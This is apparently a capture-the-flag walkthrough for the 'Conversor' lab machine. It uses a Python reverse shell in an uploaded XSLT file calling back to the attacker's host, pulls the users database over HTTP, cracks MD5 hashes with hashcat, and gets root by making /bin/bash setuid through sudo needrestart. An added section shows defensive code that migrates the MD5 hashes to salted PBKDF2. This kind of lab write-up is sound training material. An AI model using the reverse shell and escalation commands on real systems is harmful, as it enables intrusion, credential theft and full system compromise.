Command: nmap -A -Pn 10.10.11.92

Command: dirbuster -u http://conversor.htb
My wordlist is at "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt". Select it in the GUI by clicking Browse, then click Start.

http://conversor.htb/login, http://conversor.htb/register
Command: nano abc.xslt (to create the file to upload)
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.1X.XX",3333))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(["/bin/bash","-i"])

Upload any .xml file and the XSLT.xsl file (in my case), containing your IP address and port number, on the website.

Click Convert and start your listener.
Command: nc -lvnp 3333

Now cd to conversor.htb/instance
Command: python3 -m http.server 8080

cd to wherever you want to download the file, and run the following:
Command: wget http://10.10.11.92:8080/users.db

Commands:
sqlite3 users.db
sqlite> .tables
sqlite> SELECT * FROM users;

Command: nano hashes.txt
5b5c3ac3a1c897c94caad48e6c71fdec (fismathack)
d77e52c972dd92c6fa6934ab5641d10c (aso)

Command: hashcat -m 0 -a 0 hashes.txt /home/kali/Desktop/wordlists/rockyou.txt/rockyou.txt

5b5c3ac3a1c897c94caad48e6c71fdec:Keepme****andwarm
Command: ssh fismathack@10.10.11.92, and you know the password
Command: cat user.txt
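
The hashes in users.db fall to hashcat mode 0 with a common wordlist because they are raw, unsalted MD5. The following is an added example, not code from the box or from the original post, showing how an application could verify such legacy records and replace them with salted PBKDF2 on the next successful login; the table layout (username, password columns), the record format, the function names and the sample accounts are all assumptions constructed for the demo.

```python
import hashlib, hmac, os, re, sqlite3

ITERATIONS = 600_000  # assumed PBKDF2-HMAC-SHA256 work factor; tune for your hardware

def is_legacy_md5(stored):
    """Raw unsalted MD5, the format hashcat -m 0 targets: exactly 32 hex characters."""
    return re.fullmatch(r"[0-9a-fA-F]{32}", stored) is not None

def hash_password(password):
    """Build a salted record: scheme$iterations$salt_hex$digest_hex."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"

def verify(password, stored):
    if is_legacy_md5(stored):
        legacy = hashlib.md5(password.encode()).hexdigest()
        return hmac.compare_digest(legacy, stored.lower())
    try:
        scheme, iters, salt_hex, digest_hex = stored.split("$")
        dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    except ValueError:  # malformed record: wrong field count or bad hex/int
        return False
    return scheme == "pbkdf2_sha256" and hmac.compare_digest(dk.hex(), digest_hex)

def login(db, username, password):
    """Check credentials; on success, replace a legacy MD5 record in place."""
    row = db.execute("SELECT password FROM users WHERE username = ?", (username,)).fetchone()
    if row is None or not verify(password, row[0]):
        return False
    if is_legacy_md5(row[0]):
        db.execute("UPDATE users SET password = ? WHERE username = ?",
                   (hash_password(password), username))
        db.commit()
    return True

def legacy_accounts(db):  # audit helper: usernames still stored as raw MD5
    rows = db.execute("SELECT username, password FROM users ORDER BY username")
    return [u for u, p in rows if is_legacy_md5(p)]

def make_demo_db():
    """Constructed sample data: two accounts stored as raw MD5."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    for user, pw in (("alice", "constructed-pass-1"), ("bob", "constructed-pass-2")):
        md5_hex = hashlib.md5(pw.encode()).hexdigest()
        db.execute("INSERT INTO users VALUES (?, ?)", (user, md5_hex))
    return db
```

Accounts that never log in again keep their MD5 record, so legacy_accounts() gives the list that still needs a forced password reset.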

Root Flag
Command: echo 'system("chmod +s /bin/bash");' > pwn.sh
Command: sudo /usr/sbin/needrestart -c pwn.sh

Command: /bin/bash -p
Command: whoami
You know the drill!


